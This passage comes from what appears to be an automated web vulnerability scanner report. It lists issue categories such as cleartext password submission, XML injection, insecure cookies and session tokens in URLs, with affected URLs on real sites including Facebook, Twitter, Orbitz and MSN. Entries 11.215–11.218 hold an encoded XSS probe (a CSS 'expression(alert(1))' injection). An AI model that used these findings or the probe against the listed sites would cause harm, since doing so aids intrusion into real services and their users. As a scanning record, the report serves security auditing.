4.632. http://www.ehow.com/how_5073161_convert-wps-file-extension.html [Referer HTTP header]

4.633. http://www.ehow.com/how_5215115_change-startup-programs-windows-7.html [Referer HTTP header]

4.634. http://www.ehow.com/how_5381925_make-roof-rake.html [Referer HTTP header]

4.635. http://www.ehow.com/how_5521182_avoid-seasonal-affective-disorder-sad.html [Referer HTTP header]

4.636. http://www.ehow.com/how_5809012_create-indoor-gardens.html [Referer HTTP header]

4.637. http://www.ehow.com/how_6469141_improve-english-grammar-skills.html [Referer HTTP header]

4.638. http://www.ehow.com/how_7496527_resolve-5-common-grammar-problems.html [Referer HTTP header]

4.639. http://www.ehow.com/how_7744253_attach-mini-shades-update-chandelier.html [Referer HTTP header]

4.640. http://www.ehow.com/how_7856914_prevent-chimney-fires.html [Referer HTTP header]

4.641. http://www.ehow.com/how_9191_program-rca-universal.html [Referer HTTP header]

4.642. http://www.ehow.com/internet/ [Referer HTTP header]

4.643. http://www.ehow.com/job-search-and-employment/ [Referer HTTP header]

4.644. http://www.ehow.com/lawn-and-garden/ [Referer HTTP header]

4.645. http://www.ehow.com/legal/ [Referer HTTP header]

4.646. http://www.ehow.com/list_6515049_common-english-grammar-mistakes.html [Referer HTTP header]

4.647. http://www.ehow.com/list_7189463_grammar-check-tools.html [Referer HTTP header]

4.648. http://www.ehow.com/lose-weight/ [Referer HTTP header]

4.649. http://www.ehow.com/members.html [Referer HTTP header]

4.650. http://www.ehow.com/mental-health/ [Referer HTTP header]

4.651. http://www.ehow.com/music/ [Referer HTTP header]

4.652. http://www.ehow.com/parenting/ [Referer HTTP header]

4.653. http://www.ehow.com/personal-finance/ [Referer HTTP header]

4.654. http://www.ehow.com/pets-and-animals/ [Referer HTTP header]

4.655. http://www.ehow.com/photos/ [Referer HTTP header]

4.656. http://www.ehow.com/plant-care/ [Referer HTTP header]

4.657. http://www.ehow.com/plants/ [Referer HTTP header]

4.658. http://www.ehow.com/privacy.aspx [Referer HTTP header]

4.659. http://www.ehow.com/real-estate-and-investment/ [Referer HTTP header]

4.660. http://www.ehow.com/recipes/ [Referer HTTP header]

4.661. http://www.ehow.com/recreational-activities/ [Referer HTTP header]

4.662. http://www.ehow.com/relationships-and-family/ [Referer HTTP header]

4.663. http://www.ehow.com/search.aspx [Referer HTTP header]

4.664. http://www.ehow.com/share.html [Referer HTTP header]

4.665. http://www.ehow.com/site-map.html [Referer HTTP header]

4.666. http://www.ehow.com/sitemap.html [Referer HTTP header]

4.667. http://www.ehow.com/sports/ [Referer HTTP header]

4.668. http://www.ehow.com/terms_use.aspx [Referer HTTP header]

4.669. http://www.ehow.com/topic_227_take-pictures.html [Referer HTTP header]

4.670. http://www.ehow.com/topic_2488_lose-weight.html [Referer HTTP header]

4.671. http://www.ehow.com/topic_253_lose-weight-now.html [Referer HTTP header]

4.672. http://www.ehow.com/topic_3493_lose-weight-dieting.html [Referer HTTP header]

4.673. http://www.ehow.com/topic_363_winter-sports.html [Referer HTTP header]

4.674. http://www.ehow.com/topic_3818_flu-guide.html [Referer HTTP header]

4.675. http://www.ehow.com/topic_3990_home-security-systems-guide.html [Referer HTTP header]

4.676. http://www.ehow.com/topic_401_home-alarms.html [Referer HTTP header]

4.677. http://www.ehow.com/topic_4028_preparing-flu-season.html [Referer HTTP header]

4.678. http://www.ehow.com/topic_4127_home-alarm-system-guide.html [Referer HTTP header]

4.679. http://www.ehow.com/topic_429_all-flu.html [Referer HTTP header]

4.680. http://www.ehow.com/topic_4989_photo-sharing-101.html [Referer HTTP header]

4.681. http://www.ehow.com/topic_49_treating-colds-flus.html [Referer HTTP header]

4.682. http://www.ehow.com/topic_5023_jog-lose-weight.html [Referer HTTP header]

4.683. http://www.ehow.com/topic_689_black-white-photos.html [Referer HTTP header]

4.684. http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html [Referer HTTP header]

4.685. http://www.ehow.com/topic_7853_floor-fountains-guide.html [Referer HTTP header]

4.686. http://www.ehow.com/topic_7992_floor-water-fountains-101.html [Referer HTTP header]

4.687. http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html [Referer HTTP header]

4.688. http://www.ehow.com/topic_8047_water-garden-fountains-101.html [Referer HTTP header]

4.689. http://www.ehow.com/toys-and-games/ [Referer HTTP header]

4.690. http://www.ehow.com/unavailable.aspx [Referer HTTP header]

4.691. http://www.ehow.com/us-travel/ [Referer HTTP header]

4.692. http://www.ehow.com/vacations-and-travel-planning/ [Referer HTTP header]

4.693. http://www.ehow.com/video_6598099_make-sugar-spice-scrub.html [Referer HTTP header]

4.694. http://www.ehow.com/video_6976779_sensational-snacks.html [Referer HTTP header]

4.695. http://www.ehow.com/video_7199214_onion-flatbread-recipe.html [Referer HTTP header]

4.696. http://www.ehow.com/videos.html [Referer HTTP header]

4.697. http://www.ehow.com/weddings-and-parties/ [Referer HTTP header]

4.698. http://www.ehow.com/weight-management-and-body-image/ [Referer HTTP header]

4.699. http://www.ehow.com/winterize-a-garden/ [Referer HTTP header]

4.700. https://www.ehow.com/WebResource.axd [Referer HTTP header]

4.701. https://www.ehow.com/content/compressed/en-US/common-mXhI4A.css [Referer HTTP header]

4.702. https://www.ehow.com/forms/ [Referer HTTP header]

4.703. https://www.ehow.com/forms/PasswordRetrieval.aspx [Referer HTTP header]

4.704. https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx [Referer HTTP header]

4.705. https://www.ehow.com/forms/signin.aspx [Referer HTTP header]

4.706. https://www.ehow.com/privacy.aspx [Referer HTTP header]

4.707. https://www.ehow.com/terms_use.aspx [Referer HTTP header]

4.708. http://blekko.com/join [name of an arbitrarily supplied request parameter]

4.709. http://blekko.com/login [name of an arbitrarily supplied request parameter]

4.710. http://seg.sharethis.com/getSegment.php [__stid cookie]

5. Cleartext submission of password

5.1. http://boardreader.com/my.html

5.2. http://clickaider.com/

5.3. http://it.toolbox.com/blogs/database-soup

5.4. http://it.toolbox.com/blogs/database-talk

5.5. http://it.toolbox.com/blogs/db2luw

5.6. http://it.toolbox.com/blogs/db2zos

5.7. http://it.toolbox.com/blogs/elsua

5.8. http://it.toolbox.com/blogs/juice-analytics

5.9. http://it.toolbox.com/blogs/minimalit

5.10. http://it.toolbox.com/blogs/penguinista-databasiensis

5.11. http://it.toolbox.com/blogs/ppmtoday

5.12. http://wp-superslider.com/

5.13. http://www.astaro.org/

5.14. http://www.ehow.com/account/simple_login.aspx

5.15. http://www.ehow.com/account/simple_register.aspx

5.16. http://www.evow.com/

5.17. http://www.evow.com/

5.18. http://www.facebook.com/

5.19. http://www.facebook.com/r.php

5.20. http://www.plentyoffish.com/

5.21. http://www.plentyoffish.com/inbox.aspx

5.22. http://www.plentyoffish.com/meetme.aspx

5.23. http://www.plentyoffish.com/needs_test.aspx

5.24. http://www.plentyoffish.com/poftest.aspx

5.25. http://www.plentyoffish.com/seriousintro.aspx

5.26. http://www.ratedesi.com/

5.27. http://www.ratedesi.com/

5.28. http://www.reddit.com/domain/static.2mdn.net/new/x22

5.29. http://www.reddit.com/domain/static.2mdn.net/new/x22

5.30. http://www.reddit.com/domain/static.2mdn.net/x22

5.31. http://www.reddit.com/domain/static.2mdn.net/x22

5.32. http://www.shape.com/workouts/articles/blood_sugar.html

5.33. http://www.shape.com/workouts/articles/workout_schedule.html

5.34. http://www.threatexpert.com/signin.aspx

5.35. http://www.threatexpert.com/signup.aspx

5.36. http://www.untraceableemail.net/boobitrap/eCheck.php

5.37. http://www.worldmastiffforum.com/

6. XML injection

6.1. http://services.money.msn.com/quoteservice/streaming [format parameter]

6.2. http://www.plentyoffish.com/member23010679.htm [ASP.NET_SessionId cookie]

6.3. http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 [REST URL parameter 1]

6.4. http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 [REST URL parameter 1]

6.5. http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=top&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 [REST URL parameter 1]

7. SSL cookie without secure flag set

7.1. https://ads.pof.com/

7.2. https://careers.microsoft.com/

7.3. https://faq.orbitz.com/

7.4. https://faq.orbitz.com/app/answers/detail/a_id/15644

7.5. https://gc.synxis.com/xbe/rez.aspx

7.6. https://twitter.com/

7.7. https://twitter.com/about

7.8. https://twitter.com/about/contact

7.9. https://twitter.com/about/resources

7.10. https://twitter.com/account/complete

7.11. https://twitter.com/account/resend_password

7.12. https://twitter.com/login

7.13. https://twitter.com/privacy

7.14. https://twitter.com/sessions

7.15. https://twitter.com/sessions/change_locale

7.16. https://twitter.com/sessions/destroy

7.17. https://twitter.com/signup

7.18. https://twitter.com/tos

7.19. https://www.astaro.co.uk/beacon/(beid

7.20. https://www.astaro.com/beacon/(beid)/06oa3arq6oafh8mmgccr289cup83h1

7.21. https://www.astaro.com/beacon/(beid)/0mgc3arq6oafh8mmgccr289cup83h1

7.22. https://www.astaro.com/user/login

7.23. https://www.astaro.de/beacon/(beid

7.24. https://www.astaro.net/beacon/(beid

7.25. https://www.orbitz.com/account/login

7.26. https://www.orbitz.com/account/registration

7.27. https://www.orbitz.com/trips/writeReview

7.28. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

7.29. https://login.facebook.com/

7.30. https://login.facebook.com/ajax/intl/language_dialog.php

7.31. https://login.facebook.com/help/

7.32. https://login.facebook.com/login.php

7.33. https://login.facebook.com/r.php

7.34. https://login.live.com/login.srf

7.35. https://maps-api-ssl.google.com/maps

7.36. https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0

7.37. https://sitesearch.omniture.com/center/

7.38. https://www.facebook.com/

7.39. https://www.facebook.com/2008/fbml

7.40. https://www.facebook.com/login.php

7.41. https://www.orbitz.com/Secure/SignIn

7.42. https://www.orbitz.com/Secure/ViewSecureCalendar

7.43. https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile

7.44. https://www.scanalert.com/RatingVerify

8. Session token in URL

8.1. https://admin.testandtarget.omniture.com/

8.2. https://admin.testandtarget.omniture.com/login_hal.css

8.3. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js

8.4. https://admin.testandtarget.omniture.com/skins/omniture/images/adobe-lq.png

8.5. https://admin.testandtarget.omniture.com/skins/omniture/images/footer_gradient.gif

8.6. https://admin.testandtarget.omniture.com/skins/omniture/images/lgn_green_dash.gif

8.7. https://admin.testandtarget.omniture.com/skins/omniture/images/lgn_head_bg.png

8.8. https://admin.testandtarget.omniture.com/skins/omniture/images/omtr_lgn_headerbar.gif

8.9. https://admin.testandtarget.omniture.com/skins/omniture/images/omtr_lgn_left_panel.jpg

8.10. https://admin.testandtarget.omniture.com/skins/omniture/login.css

8.11. https://admin.testandtarget.omniture.com/skins/omniture/static_header.css

8.12. https://admin.testandtarget.omniture.com/skins/omniture/terms_of_use.html

8.13. http://api.demandbase.com/api/v1/ip.json

8.14. https://gc.synxis.com/xbe/rez.aspx

8.15. http://l.sharethis.com/pview

8.16. http://local.msn.com/

8.17. http://local.msn.com/hourly.aspx

8.18. http://local.msn.com/movies-events.aspx

8.19. http://local.msn.com/news.aspx

8.20. http://local.msn.com/restaurants.aspx

8.21. http://local.msn.com/sports.aspx

8.22. http://local.msn.com/ten-day.aspx

8.23. http://local.msn.com/weather.aspx

8.24. http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard

8.25. https://my.omniture.com/p/suite/1.2/index.html

8.26. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

8.27. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

8.28. http://track.roiservice.com/track/LogToDb.asp.aspx

8.29. http://www.facebook.com/extern/login_status.php

9. Flash cross-domain policy

9.1. http://pics.plentyoffish.com/crossdomain.xml

9.2. http://pixel.facebook.com/crossdomain.xml

9.3. http://www.evow.com/crossdomain.xml

10. ASP.NET ViewState without MAC enabled

10.1. http://beta-ads.ace.advertising.com/

10.2. http://p.ace.advertising.com/

10.3. http://r1-ads.ace.advertising.com/

10.4. http://r1.ace.advertising.com/

10.5. http://www.ehow.com/account/simple_register.aspx

10.6. https://www.ehow.com/account/simple_register.aspx

10.7. https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx

11. Cookie scoped to parent domain

11.1. http://dev.twitter.com/

11.2. http://m.twitter.com/

11.3. http://sorry.google.com/sorry/Captcha

11.4. http://www.bing.com/travel/

11.5. http://www.bing.com/travel/deals/airline-ticket-deals.do

11.6. http://www.cafemom.com/group/416

11.7. http://www.cafemom.com/group/46574

11.8. http://www.directstartv.com/

11.9. http://www.faneuilhallmarketplace.com/

11.10. http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/

11.11. http://www.mywot.com/en/scorecard/2mdn.net

11.12. http://www.opensource.org/licenses/gpl-license.php

11.13. http://www.opensource.org/licenses/mit-license.php

11.14. http://www.pctools.com/free-antivirus/

11.15. http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html

11.16. http://www.trw.com/

11.17. http://a.rad.msn.com/ADSAdClient31.dll

11.18. http://ad-emea.doubleclick.net/click

11.19. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.59

11.20. http://ad.doubleclick.net/ad/N553.126834.KONTERATECHNOLOGIES/B5039995

11.21. http://ad.doubleclick.net/adi/N3285.google/B2343920.91

11.22. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3

11.23. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4

11.24. http://ad.doubleclick.net/adi/dmd.ehow/homepage

11.25. http://ad.doubleclick.net/adj/dmd.ehow/gen

11.26. http://ad.doubleclick.net/click

11.27. http://ad.doubleclick.net/clk

11.28. http://adclick.g.doubleclick.net/aclk

11.29. http://ads.adbrite.com/adserver/vdi/762701

11.30. http://ads.revsci.net/adserver/ako

11.31. https://adwords.google.com/select/Login

11.32. http://api.bizographics.com/v1/profile.json

11.33. http://b.scorecardresearch.com/b

11.34. http://blog.facebook.com/blog.php

11.35. http://blogsearch.google.com/blogsearch

11.36. http://books.google.com/

11.37. http://books.google.com/books

11.38. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

11.39. http://businessonmain.msn.com/browseresources/articles/firststeps.aspx

11.40. http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx

11.41. http://businessonmain.msn.com/questions/default.aspx

11.42. http://businessonmain.msn.com/videos/coolrunnings.aspx

11.43. http://c.chango.com/collector/tag.js

11.44. http://c.statcounter.com/t.php

11.45. http://cdn-sitelife.ehow.com/ver1.0/Direct/DirectProxy

11.46. http://code.google.com/apis/maps/terms.html

11.47. http://code.google.com/p/swfobject/

11.48. http://code.google.com/p/swfobject/wiki/documentation

11.49. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

11.50. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13r09h5ct/*http:/ad.yieldmanager.com/imp

11.51. http://cspix.media6degrees.com/orbserv/hbpix

11.52. http://deals.msn.com/

11.53. http://developer.yahoo.com/yui/compressor/

11.54. http://developers.facebook.com/plugins/

11.55. http://dm.demdex.net/pixel/10236

11.56. http://dpm.demdex.net/demdot.jpg

11.57. http://ds.addthis.com/red/psi/p.json

11.58. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json

11.59. http://edge.quantserve.com/quant.js

11.60. http://editorial.autos.msn.com/articles/default.aspx

11.61. http://editorial.autos.msn.com/blogs/autosblog.aspx

11.62. http://editorial.autos.msn.com/media/default.aspx

11.63. http://editorial.autos.msn.com/media/video/default.aspx

11.64. http://editorial.autos.msn.com/new-cars/default.aspx

11.65. http://editorial.autos.msn.com/used-cars/default.aspx

11.66. http://entertainment.msn.com/

11.67. http://entertainment.msn.com/news/

11.68. http://entertainment.msn.com/video/

11.69. http://groups.google.com/groups

11.70. http://health.msn.com/

11.71. http://health.msn.com/health-topics/quit-smoking/articlepage.aspx

11.72. http://hit.clickaider.com/clickaider.js

11.73. http://hit.clickaider.com/pv

11.74. http://i.simpli.fi/dpx.js

11.75. http://ib.adnxs.com/getuidu

11.76. http://ib.adnxs.com/px

11.77. http://id.google.com/verify/EAAAAE_-e4uKsVJHxtz4cPOf7JM.gif

11.78. http://id.google.com/verify/EAAAAFdw42YFAA5jJ6_W2uU2sso.gif

11.79. http://id.google.com/verify/EAAAAGw6wehKYIfPfAuhig8lJow.gif

11.80. http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif

11.81. http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif

11.82. http://id.google.com/verify/EAAAAM7b2OjFQ5ateN5qC1yJ4pM.gif

11.83. http://id.google.com/verify/EAAAAMVVh-syzGBXI20HkVGrij0.gif

11.84. http://id.google.com/verify/EAAAANQX8mNlPuHuy5T3Ad-9QzA.gif

11.85. http://image2.pubmatic.com/AdServer/Pug

11.86. http://images.google.com/images

11.87. http://info.yahoo.com/w3c/p3p.xml

11.88. http://js.revsci.net/gateway/gw.js

11.89. http://khm0.google.com/kh/v/x3d78/x26

11.90. http://khm1.google.com/kh/v/x3d78/x26

11.91. http://khmdb0.google.com/kh

11.92. http://khmdb1.google.com/kh

11.93. http://kona32.kontera.com/KonaGet.js

11.94. http://latino.msn.com/

11.95. http://lifestyle.msn.com/

11.96. http://lifestyle.msn.com/relationships/

11.97. http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx

11.98. http://lifestyle.msn.com/relationships/your-money-today/article.aspx

11.99. http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx

11.100. http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx

11.101. http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx

11.102. http://lifestyle.msn.com/your-look/

11.103. http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx

11.104. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx

11.105. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx

11.106. http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx

11.107. http://local.msn.com/

11.108. http://local.msn.com/hourly.aspx

11.109. http://local.msn.com/movies-events.aspx

11.110. http://local.msn.com/news.aspx

11.111. http://local.msn.com/restaurants.aspx

11.112. http://local.msn.com/sports.aspx

11.113. http://local.msn.com/ten-day.aspx

11.114. http://local.msn.com/weather.aspx

11.115. https://login.facebook.com/

11.116. https://login.facebook.com/ajax/intl/language_dialog.php

11.117. https://login.facebook.com/help/

11.118. https://login.facebook.com/login.php

11.119. https://login.facebook.com/r.php

11.120. https://maps-api-ssl.google.com/maps

11.121. http://media.fastclick.net/w/tre

11.122. http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239

11.123. http://movies.msn.com/

11.124. http://movies.msn.com/movies/article.aspx

11.125. http://movies.msn.com/new-on-dvd/movies/

11.126. http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

11.127. http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/

11.128. http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/

11.129. http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/

11.130. http://movies.msn.com/showtimes/showtimes.aspx

11.131. http://movies.msn.com/the-rundown/the-guard/story_5/

11.132. http://mt2.google.com/mapstt

11.133. http://mt3.google.com/mapstt

11.134. http://music.msn.com/

11.135. http://music.msn.com/music/article.aspx

11.136. http://my.msn.com/

11.137. http://my.omniture.com/

11.138. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Lendingtree/Retargeting_Homepage_Nonsecure@Bottom3

11.139. http://news.google.com/news/story

11.140. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697

11.141. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358

11.142. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017

11.143. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058

11.144. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902

11.145. https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0

11.146. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx

11.147. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx

11.148. http://picasaweb.google.com/lh/view

11.149. https://picasaweb.google.com/lh/view

11.150. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.151. http://pix04.revsci.net/F08747/b3/0/3/1003161/102504215.js

11.152. http://pix04.revsci.net/F08747/b3/0/3/1003161/1084292.js

11.153. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js

11.154. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js

11.155. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js

11.156. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js

11.157. http://pix04.revsci.net/F08747/b3/0/3/1003161/123757995.js

11.158. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js

11.159. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js

11.160. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js

11.161. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js

11.162. http://pix04.revsci.net/F08747/b3/0/3/1003161/157224151.js

11.163. http://pix04.revsci.net/F08747/b3/0/3/1003161/164892384.js

11.164. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js

11.165. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js

11.166. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js

11.167. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js

11.168. http://pix04.revsci.net/F08747/b3/0/3/1003161/310338891.js

11.169. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js

11.170. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js

11.171. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js

11.172. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js

11.173. http://pix04.revsci.net/F08747/b3/0/3/1003161/374759838.js

11.174. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js

11.175. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js

11.176. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js

11.177. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js

11.178. http://pix04.revsci.net/F08747/b3/0/3/1003161/536378960.js

11.179. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js

11.180. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js

11.181. http://pix04.revsci.net/F08747/b3/0/3/1003161/591799300.js

11.182. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js

11.183. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js

11.184. http://pix04.revsci.net/F08747/b3/0/3/1003161/664658967.js

11.185. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js

11.186. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js

11.187. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js

11.188. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js

11.189. http://pix04.revsci.net/F08747/b3/0/3/1003161/70794208.js

11.190. http://pix04.revsci.net/F08747/b3/0/3/1003161/715159401.js

11.191. http://pix04.revsci.net/F08747/b3/0/3/1003161/72215668.js

11.192. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js

11.193. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js

11.194. http://pix04.revsci.net/F08747/b3/0/3/1003161/737191144.js

11.195. http://pix04.revsci.net/F08747/b3/0/3/1003161/769036262.js

11.196. http://pix04.revsci.net/F08747/b3/0/3/1003161/814275397.js

11.197. http://pix04.revsci.net/F08747/b3/0/3/1003161/844309645.js

11.198. http://pix04.revsci.net/F08747/b3/0/3/1003161/868788633.js

11.199. http://pix04.revsci.net/F08747/b3/0/3/1003161/869604030.js

11.200. http://pix04.revsci.net/F08747/b3/0/3/1003161/887063996.js

11.201. http://pix04.revsci.net/F08747/b3/0/3/1003161/934643839.js

11.202. http://pixel.facebook.com/ajax/register/logging.php

11.203. http://pixel.invitemedia.com/data_sync

11.204. http://pixel.mathtag.com/event/js

11.205. http://pixel.quantserve.com/pixel/p-78V15bIOxaPIs.gif

11.206. http://pixel.tree.com/api/image.ashx/collect

11.207. http://pixel.tree.com/pt.ashx

11.208. http://px.admonkey.dapper.net/PixelMonkey

11.209. http://r.casalemedia.com/j.gif

11.210. http://r.openx.net/set

11.211. http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=11479363=_4d48254a,7376408871,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=11479363&siteValue=0000747145&city=Dallas/

11.212. http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=25807272=_4d482560,1483511146,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=25807272&siteValue=0000747145&city=Dallas/

11.213. http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000918410/bnum=29104868/cstr=29104868=_4d482547,0572256108,749715^918410^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AScb47c603bd494ad09cac82f8e21e47bc

11.214. http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000964772/bnum=10533267/cstr=10533267=_4d48255e,5052657456,749715^964772^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=ASda8e1ea7652d4c0992c679c6d2b63588

11.215. http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=11479363/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

11.216. http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=25807272/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

11.217. http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=10533267/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

11.218. http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=29104868/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

11.219. http://realestate.msn.com/

11.220. http://realestate.msn.com/slideshow.aspx

11.221. http://sales.liveperson.net/hc/15744040/

11.222. http://scholar.google.com/scholar

11.223. http://segment-pixel.invitemedia.com/set_partner_uid

11.224. http://segment-pixel.invitemedia.com/setuid

11.225. http://showads.pubmatic.com/AdServer/AdServerServlet

11.226. http://showads.pubmatic.com/AdServer/AdServerServlet

11.227. http://showads.pubmatic.com/AdServer/AdServerServlet

11.228. http://showads.pubmatic.com/AdServer/AdServerServlet

11.229. http://showads.pubmatic.com/AdServer/AdServerServlet

11.230. http://showads.pubmatic.com/AdServer/AdServerServlet

11.231. http://showads.pubmatic.com/AdServer/AdServerServlet

11.232. http://showads.pubmatic.com/AdServer/AdServerServlet

11.233. http://sitelife.ehow.com/ver1.0/Direct/Process

11.234. https://sitesearch.omniture.com/center/

11.235. http://social.entertainment.msn.com/bloglist.aspx

11.236. http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx

11.237. http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx

11.238. http://solutions.liveperson.com/ref/lppb.asp

11.239. http://sorry.google.com/sorry/

11.240. http://sorry.google.com/sorry/Captcha

